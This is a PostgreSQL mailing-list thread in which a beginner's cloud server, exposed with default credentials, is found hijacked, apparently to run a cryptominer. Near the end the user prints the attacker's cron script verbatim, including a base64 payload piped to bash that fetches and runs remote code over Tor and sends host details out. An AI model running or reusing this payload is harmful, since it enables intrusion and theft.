Thread: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou

I have set up PostgreSQL according to this link:

The issue is that after a few hours of operation, even if I don’t access the database at all, the Postgres process fails:

christan@vultr:~$ systemctl status postgresql*
postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: enabled)
     Active: active (exited) since Sat 2022-12-31 19:56:56 UTC; 24h ago
    Process: 3330722 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 3330722 (code=exited, status=0/SUCCESS)

postgresql@12-main.service - PostgreSQL Cluster 12-main
     Loaded: loaded (/lib/systemd/system/postgresql@.service; enabled-runtime; vendor preset: enabled)
     Active: failed (Result: exit-code) since Sat 2022-12-31 21:33:52 UTC; 23h ago
    Process: 3330697 ExecStart=/usr/bin/pg_ctlcluster --skip-systemctl-redirect 12-main start (code=exited, status=0/SUCCESS)
    Process: 3341739 ExecStop=/usr/bin/pg_ctlcluster --skip-systemctl-redirect -m fast 12-main stop (code=exited, status=2)
   Main PID: 3330702 (code=exited, status=0/SUCCESS)

Moreover, it looks like there is some process stuck into some eternal loop, eating up 4 cores:

christan@vultr:~$ ps -ef | grep postgres
postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
postgres 3419125       1 18 13:57 ?        01:17:03 tracepath
christan 3463982 3462489  0 20:44 pts/0    00:00:00 grep --color=auto postgres

christan@vultr:~$ top -p 3344758
    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                                                                                                                                 
3344758 postgres  20   0 2443428   2.3g      4 S 282.3  29.5   5201:46 OElid7Dp                                                                                                                                                

Doing just systemctl postgresql doesn’t restart the process, I have to manually kill all the above processes then do systemctl restart.

Lastly, in the journalctl I see the following logs:

Dec 31 21:33:35 vultr.guest sudo[3340093]: pam_unix(sudo:auth): conversation failed
Dec 31 21:33:35 vultr.guest sudo[3340093]: pam_unix(sudo:auth): auth could not identify password for [postgres]
Dec 31 21:33:35 vultr.guest sudo[3340093]: postgres : user NOT in sudoers ; TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=root ; COMMAND=/usr/sbin/sysctl kernel.nmi_watchdog=0
Dec 31 21:33:52 vultr.guest crontab[3341582]: (postgres) LIST (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341584]: (postgres) REPLACE (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341585]: (postgres) LIST (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341588]: (postgres) LIST (postgres)

What am I missing here, maybe I have to make sure that postgres user has sudo rights?


Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Adrian Klaver
On 1/1/23 12:51, Antonis Christodoulou wrote:
> Hi,
> I have set up PostgreSQL according to this link:
> The issue is that after a few hours of operation, even if I don’t access 
> the database at all, the Postgres process fails:
> *christan@vultr*:*~*$ systemctl status postgresql*
> *●*postgresql.service - PostgreSQL RDBMS
>       Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; 
> vendor preset: enabled)
>       Active: *active (exited)*since Sat 2022-12-31 19:56:56 UTC; 24h ago
>      Process: 3330722 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
>     Main PID: 3330722 (code=exited, status=0/SUCCESS)
> *●*postgresql@12-main.service <mailto:postgresql@12-main.service> - 
> PostgreSQL Cluster 12-main
>       Loaded: loaded (/lib/systemd/system/postgresql@.service; 
> enabled-runtime; vendor preset: enabled)
>       Active: *failed*(Result: exit-code) since Sat 2022-12-31 21:33:52 
> UTC; 23h ago
>      Process: 3330697 ExecStart=/usr/bin/pg_ctlcluster 
> --skip-systemctl-redirect 12-main start (code=exited, status=0/SUCCESS)
>      Process: 3341739 ExecStop=/usr/bin/pg_ctlcluster 
> --skip-systemctl-redirect -m fast 12-main stop *(code=exited, status=2)*
>     Main PID: 3330702 (code=exited, status=0/SUCCESS)
> Moreover, it looks like there is some process stuck into some eternal 
> loop, eating up 4 cores:
> *christan@vultr*:*~*$ ps -ef | grep postgres
> *postgres*3342383       1  0  2022 ?        00:00:00 FzXlkULu
> *postgres*3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
> *postgres*3419125       1 18 13:57 ?        01:17:03 tracepath
> christan 3463982 3462489  0 20:44 pts/0    00:00:00 grep --color=auto 
> *postgres*

The above and the below look weird.

Is this machine open to the world?

> *
> *
> *christan@vultr*:*~*$ top -p 3344758
>      PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ 
> 3344758 postgres  20   0 2443428   2.3g      4 S 282.3  29.5   5201:46 
> OElid7Dp
> Doing just systemctl postgresql doesn’t restart the process, I have to 
> manually kill all the above processes then do systemctl restart.
> Lastly, in the journalctl I see the following logs:
> Dec 31 21:33:35 vultr.guest sudo[3340093]: *pam_unix(sudo:auth): 
> co**nversation failed*
> Dec 31 21:33:35 vultr.guest sudo[3340093]: *pam_unix(sudo:auth): auth 
> could not identify password for [postgres]*
> Dec 31 21:33:35 vultr.guest sudo[3340093]: *postgres : user NOT in 
> sudoers ; TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=root ; 
> COMMAND=/usr/sbin/sysctl kernel.nmi_watchdog=0*
> Dec 31 21:33:52 vultr.guest crontab[3341582]: (postgres) LIST (postgres)
> Dec 31 21:33:52 vultr.guest crontab[3341584]: (postgres) REPLACE (postgres)
> Dec 31 21:33:52 vultr.guest crontab[3341585]: (postgres) LIST (postgres)
> Dec 31 21:33:52 vultr.guest crontab[3341588]: (postgres) LIST (postgres)
> What am I missing here, maybe I have to make sure that postgres user has 
> sudo rights?
> Regards,
> Antonis

Adrian Klaver

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou
Hello Adrian,

No it’s not open, but the database itself has very simple credentials (I am just starting with PostgreSQL). What’s weird about the logs?

On 1 Jan 2023, at 11:00 PM, Adrian Klaver <> wrote:

On 1/1/23 12:51, Antonis Christodoulou wrote:
I have set up PostgreSQL according to this link: <>
The issue is that after a few hours of operation, even if I don’t access the database at all, the Postgres process fails:
*christan@vultr*:*~*$ systemctl status postgresql*
*●*postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: enabled)
Active: *active (exited)*since Sat 2022-12-31 19:56:56 UTC; 24h ago
Process: 3330722 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 3330722 (code=exited, status=0/SUCCESS)
*●*postgresql@12-main.service <mailto:postgresql@12-main.service> - PostgreSQL Cluster 12-main
Loaded: loaded (/lib/systemd/system/postgresql@.service; enabled-runtime; vendor preset: enabled)
Active: *failed*(Result: exit-code) since Sat 2022-12-31 21:33:52 UTC; 23h ago
Process: 3330697 ExecStart=/usr/bin/pg_ctlcluster --skip-systemctl-redirect 12-main start (code=exited, status=0/SUCCESS)
Process: 3341739 ExecStop=/usr/bin/pg_ctlcluster --skip-systemctl-redirect -m fast 12-main stop *(code=exited, status=2)*
Main PID: 3330702 (code=exited, status=0/SUCCESS)
Moreover, it looks like there is some process stuck into some eternal loop, eating up 4 cores:
*christan@vultr*:*~*$ ps -ef | grep postgres
*postgres*3342383 1  0  2022 ?  00:00:00 FzXlkULu
*postgres*3344758 1 99  2022 ?  3-14:39:11 OElid7Dp
*postgres*3419125 1 18 13:57 ?  01:17:03 tracepath
christan 3463982 3462489  0 20:44 pts/0  00:00:00 grep --color=auto *postgres*

The above and the below look weird.

Is this machine open to the world?

*christan@vultr*:*~*$ top -p 3344758
3344758 postgres  20 0 2443428 2.3g  4 S 282.3  29.5 5201:46 OElid7Dp
Doing just systemctl postgresql doesn’t restart the process, I have to manually kill all the above processes then do systemctl restart.
Lastly, in the journalctl I see the following logs:
Dec 31 21:33:35 vultr.guest sudo[3340093]: *pam_unix(sudo:auth): co**nversation failed*
Dec 31 21:33:35 vultr.guest sudo[3340093]: *pam_unix(sudo:auth): auth could not identify password for [postgres]*
Dec 31 21:33:35 vultr.guest sudo[3340093]: *postgres : user NOT in sudoers ; TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=root ; COMMAND=/usr/sbin/sysctl kernel.nmi_watchdog=0*
Dec 31 21:33:52 vultr.guest crontab[3341582]: (postgres) LIST (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341584]: (postgres) REPLACE (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341585]: (postgres) LIST (postgres)
Dec 31 21:33:52 vultr.guest crontab[3341588]: (postgres) LIST (postgres)
What am I missing here, maybe I have to make sure that postgres user has sudo rights?

Adrian Klaver

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Adrian Klaver
On 1/1/23 13:11, Antonis Christodoulou wrote:
> Hello Adrian,
> No it’s not open, but the database itself has very simple credentials (I 
> am just starting with PostgreSQL). What’s weird about the logs?

Not the logs the ps output. I would expect to see something like:

ps -ef | grep postgres
postgres  395382       1  0  2022 ?        00:03:31 
/usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main -c 
postgres  395384  395382  0  2022 ?        00:00:01 postgres: 14/main: 
postgres  395385  395382  0  2022 ?        00:00:26 postgres: 14/main: 
background writer
postgres  395386  395382  0  2022 ?        00:00:26 postgres: 14/main: 
postgres  395387  395382  0  2022 ?        00:01:45 postgres: 14/main: 
autovacuum launcher
postgres  395388  395382  0  2022 ?        00:00:05 postgres: 14/main: 
archiver last was 0000000100000003000000B9.00000028.backup
postgres  395389  395382  0  2022 ?        00:01:37 postgres: 14/main: 
stats collector
postgres  395390  395382  0  2022 ?        00:02:24 postgres: 14/main: 
pg_cron launcher
postgres  395391  395382  0  2022 ?        00:00:01 postgres: 14/main: 
logical replication launcher


postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

just does not look right.

Adrian Klaver

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Rob Sargent
On 1/1/23 14:48, Adrian Klaver wrote:
On 1/1/23 13:11, Antonis Christodoulou wrote:
Hello Adrian,

No it’s not open, but the database itself has very simple credentials (I am just starting with PostgreSQL). What’s weird about the logs?

Not the logs the ps output. I would expect to see something like:

ps -ef | grep postgres
postgres  395382       1  0  2022 ?        00:03:31 /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main -c config_file=/etc/postgresql/14/main/postgresql.conf
postgres  395384  395382  0  2022 ?        00:00:01 postgres: 14/main: checkpointer
postgres  395385  395382  0  2022 ?        00:00:26 postgres: 14/main: background writer
postgres  395386  395382  0  2022 ?        00:00:26 postgres: 14/main: walwriter
postgres  395387  395382  0  2022 ?        00:01:45 postgres: 14/main: autovacuum launcher
postgres  395388  395382  0  2022 ?        00:00:05 postgres: 14/main: archiver last was 0000000100000003000000B9.00000028.backup
postgres  395389  395382  0  2022 ?        00:01:37 postgres: 14/main: stats collector
postgres  395390  395382  0  2022 ?        00:02:24 postgres: 14/main: pg_cron launcher
postgres  395391  395382  0  2022 ?        00:00:01 postgres: 14/main: logical replication launcher


postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

just does not look right.

At the very least disconnect that machine from the internet.  Completely. 

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou
I just added postgres to the sudoers list, nothing, same issue (slightly different journalctl logs)

This is a machine in the cloud, I can’t disconnect it.

And yes the ps looks like this precisely when I do a fresh restart. I kill all postgres processes and restart:

christan@vultr:~$ for i in `ps -ef | grep postgres | awk '{print $2}'`; do sudo kill $i; done
christan@vultr:~$ sudo systemctl restart postgresql

Then this is the output of me ps:

christan@vultr:~$ ps -ef | grep postgres
postgres 3504795       1  0 05:51 ?        00:00:00 /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf
postgres 3504797 3504795  0 05:51 ?        00:00:00 postgres: 12/main: checkpointer   
postgres 3504798 3504795  0 05:51 ?        00:00:00 postgres: 12/main: background writer   
postgres 3504799 3504795  0 05:51 ?        00:00:00 postgres: 12/main: walwriter   
postgres 3504800 3504795  0 05:51 ?        00:00:00 postgres: 12/main: autovacuum launcher   
postgres 3504801 3504795  0 05:51 ?        00:00:00 postgres: 12/main: stats collector   
postgres 3504802 3504795  0 05:51 ?        00:00:00 postgres: 12/main: logical replication launcher   
christan 3504902 3504620  0 05:59 pts/0    00:00:00 grep --color=auto postgres

After a couple of hours, all these go away and I just see that weird ps output… :(

Then this is what I see in journalctl:

Jan 01 21:36:03 vultr.guest systemd[1]: Starting PostgreSQL Cluster 12-main...
Jan 01 21:36:06 vultr.guest systemd[1]: Started PostgreSQL Cluster 12-main.
Jan 01 22:58:44 vultr.guest sudo[3472381]: postgres : TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=root ; COMMAND=/usr/sbin/sysctl kernel.nmi_watchdog=0
Jan 01 22:58:44 vultr.guest sudo[3472381]: pam_unix(sudo:session): session opened for user root by (uid=0)
Jan 01 22:58:44 vultr.guest sudo[3472381]: pam_unix(sudo:session): session closed for user root
Jan 01 22:58:57 vultr.guest crontab[3473870]: (postgres) LIST (postgres)
Jan 01 22:58:57 vultr.guest crontab[3473873]: (postgres) LIST (postgres)
Jan 01 22:58:57 vultr.guest crontab[3474021]: (postgres) LIST (postgres)
Jan 01 22:58:57 vultr.guest crontab[3474024]: (postgres) LIST (postgres)
Jan 01 22:58:57 vultr.guest crontab[3474026]: (postgres) REPLACE (postgres)
Jan 01 22:58:57 vultr.guest postgresql@12-main[3474027]: Cluster is not running.
Jan 01 22:58:57 vultr.guest systemd[1]: postgresql@12-main.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Jan 01 22:58:57 vultr.guest systemd[1]: postgresql@12-main.service: Failed with result 'exit-code'.

I may just install the same way into a dedicated AWS instance, just to see if I’m getting the same behavior there... 

On 1 Jan 2023, at 11:50 PM, Rob Sargent <> wrote:

On 1/1/23 14:48, Adrian Klaver wrote:
On 1/1/23 13:11, Antonis Christodoulou wrote:
Hello Adrian,

No it’s not open, but the database itself has very simple credentials (I am just starting with PostgreSQL). What’s weird about the logs?

Not the logs the ps output. I would expect to see something like:

ps -ef | grep postgres
postgres  395382       1  0  2022 ?        00:03:31 /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main -c config_file=/etc/postgresql/14/main/postgresql.conf
postgres  395384  395382  0  2022 ?        00:00:01 postgres: 14/main: checkpointer
postgres  395385  395382  0  2022 ?        00:00:26 postgres: 14/main: background writer
postgres  395386  395382  0  2022 ?        00:00:26 postgres: 14/main: walwriter
postgres  395387  395382  0  2022 ?        00:01:45 postgres: 14/main: autovacuum launcher
postgres  395388  395382  0  2022 ?        00:00:05 postgres: 14/main: archiver last was 0000000100000003000000B9.00000028.backup
postgres  395389  395382  0  2022 ?        00:01:37 postgres: 14/main: stats collector
postgres  395390  395382  0  2022 ?        00:02:24 postgres: 14/main: pg_cron launcher
postgres  395391  395382  0  2022 ?        00:00:01 postgres: 14/main: logical replication launcher


postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

just does not look right.

At the very least disconnect that machine from the internet.  Completely. 

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Tom Lane
Antonis Christodoulou <>
> This is a machine in the cloud, I can’t disconnect it.

In that case, you need to be taking nonzero security precautions.

> And yes the ps looks like this precisely when I do a fresh restart. I kill all postgres processes and restart:
> Then this is the output of me ps:

That looks fine ... but this doesn't:

>>> postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
>>> postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
>>> postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

Somebody is hacking into your system and commandeering it to run
something resource-intensive, possibly a bitcoin miner.  Whatever
it is, it's trying to obscure its process name which is hardly
a sign of good intentions.

I'd counsel taking a hard look at your pg_hba.conf to be sure
it's not allowing non-credentialed logins from anywhere.  And
for pete's sake don't use a guessable password.

            regards, tom lane

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Ahmet Demir
And I can suggest checking cron jobs both on root and postgres, killing those processes and changing root postgres passwords.


On Mon, 2 Jan 2023 at 09:19, Tom Lane <> wrote:
Antonis Christodoulou <> <VI1P193MB051005C8BE974502A0D4A315E1F79@VI1P193MB0510.EURP193.PROD.OUTLOOK.COM> writes:
> This is a machine in the cloud, I can’t disconnect it.

In that case, you need to be taking nonzero security precautions.

> And yes the ps looks like this precisely when I do a fresh restart. I kill all postgres processes and restart:
> Then this is the output of me ps:

That looks fine ... but this doesn't:

>>> postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
>>> postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
>>> postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

Somebody is hacking into your system and commandeering it to run
something resource-intensive, possibly a bitcoin miner.  Whatever
it is, it's trying to obscure its process name which is hardly
a sign of good intentions.

I'd counsel taking a hard look at your pg_hba.conf to be sure
it's not allowing non-credentialed logins from anywhere.  And
for pete's sake don't use a guessable password.

                        regards, tom lane

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou
Hmm wow, never thought this could be the case. Yes I am using postgres/postgres for my db, and I am indeed allowing full remote access in my pg_hba.conf (I would definitely change this, just wanted to start testing it…)

# Remote database connections
host all postgres md5

On 2 Jan 2023, at 8:29 AM, Ahmet Demir <> wrote:

And I can suggest checking cron jobs both on root and postgres, killing those processes and changing root postgres passwords.


On Mon, 2 Jan 2023 at 09:19, Tom Lane <> wrote:
Antonis Christodoulou <> <VI1P193MB051005C8BE974502A0D4A315E1F79@VI1P193MB0510.EURP193.PROD.OUTLOOK.COM> writes:
> This is a machine in the cloud, I can’t disconnect it.

In that case, you need to be taking nonzero security precautions.

> And yes the ps looks like this precisely when I do a fresh restart. I kill all postgres processes and restart:
> Then this is the output of me ps:

That looks fine ... but this doesn't:

>>> postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
>>> postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
>>> postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

Somebody is hacking into your system and commandeering it to run
something resource-intensive, possibly a bitcoin miner.  Whatever
it is, it's trying to obscure its process name which is hardly
a sign of good intentions.

I'd counsel taking a hard look at your pg_hba.conf to be sure
it's not allowing non-credentialed logins from anywhere.  And
for pete's sake don't use a guessable password.

                        regards, tom lane

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou
And for the record, Ahmet, here’s a weird cron job:

christan@vultr:~$ sudo crontab -l -u postgres
13 * * * * /var/lib/postgresql/ > /dev/null 2>&1 &

Had no idea somebody can add something like this externally...

On 2 Jan 2023, at 8:34 AM, Antonis Christodoulou <> wrote:

Hmm wow, never thought this could be the case. Yes I am using postgres/postgres for my db, and I am indeed allowing full remote access in my pg_hba.conf (I would definitely change this, just wanted to start testing it…)

# Remote database connections
host all postgres md5

On 2 Jan 2023, at 8:29 AM, Ahmet Demir <> wrote:

And I can suggest checking cron jobs both on root and postgres, killing those processes and changing root postgres passwords.


On Mon, 2 Jan 2023 at 09:19, Tom Lane <> wrote:
Antonis Christodoulou <> <VI1P193MB051005C8BE974502A0D4A315E1F79@VI1P193MB0510.EURP193.PROD.OUTLOOK.COM> writes:
> This is a machine in the cloud, I can’t disconnect it.

In that case, you need to be taking nonzero security precautions.

> And yes the ps looks like this precisely when I do a fresh restart. I kill all postgres processes and restart:
> Then this is the output of me ps:

That looks fine ... but this doesn't:

>>> postgres 3342383       1  0  2022 ?        00:00:00 FzXlkULu
>>> postgres 3344758       1 99  2022 ?        3-14:39:11 OElid7Dp
>>> postgres 3419125       1 18 13:57 ?        01:17:03 tracepath

Somebody is hacking into your system and commandeering it to run
something resource-intensive, possibly a bitcoin miner.  Whatever
it is, it's trying to obscure its process name which is hardly
a sign of good intentions.

I'd counsel taking a hard look at your pg_hba.conf to be sure
it's not allowing non-credentialed logins from anywhere.  And
for pete's sake don't use a guessable password.

                        regards, tom lane

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Matthias Apitz
El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió:

> And for the record, Ahmet, here’s a weird cron job:
> christan@vultr:~$ sudo crontab -l -u postgres
> 13 * * * * /var/lib/postgresql/ > /dev/null 2>&1 &
> Had no idea somebody can add something like this externally...

Please post the content of this script.


Matthias Apitz, ✉, +49-176-38902045
Public GnuPG key:

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Antonis Christodoulou
Hey Matthias, here it is:

christan@vultr:~$ sudo cat /var/lib/postgresql/
exec &>/dev/null
echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc
echo eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash

On 2 Jan 2023, at 9:46 AM, Matthias Apitz <> wrote:

El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió:

And for the record, Ahmet, here’s a weird cron job:

christan@vultr:~$ sudo crontab -l -u postgres
13 * * * * /var/lib/postgresql/ > /dev/null 2>&1 &

Had no idea somebody can add something like this externally...

Please post the content of this script.


Matthias Apitz, ✉, +49-176-38902045
Public GnuPG key:

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Matthias Apitz
El día Montag, Januar 02, 2023 a las 11:54:53 +0300, Ebubekir Büyüktosun escribió:

>    Hey Antonis,
>    If you decode the below Base64 code, you will see the following bash
>    script that is tried to execute on your machine;
> ...

Without analyzing the shell code in detail, this is clear evidence of an
attack. You must purge the full operating system and reinstall it from
scratch with better credentials of Linux and later PostgreSQL.

Matthias Apitz, ✉, +49-176-38902045
Public GnuPG key:

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

Julien Rouhaud
On Mon, Jan 02, 2023 at 08:53:32AM +0200, Antonis Christodoulou wrote:
> And for the record, Ahmet, here’s a weird cron job:
> christan@vultr:~$ sudo crontab -l -u postgres
> 13 * * * * /var/lib/postgresql/ > /dev/null 2>&1 &
> Had no idea somebody can add something like this externally...

Just to be clear, having a superuser connection is basically the same as having
a shell open on the server running with the postgres (or the OS user running
the postgres service) user.  If your postgres OS user is a member of the cron
group it can add its own entry easily, the rest being stored in a
postgres-owned directory.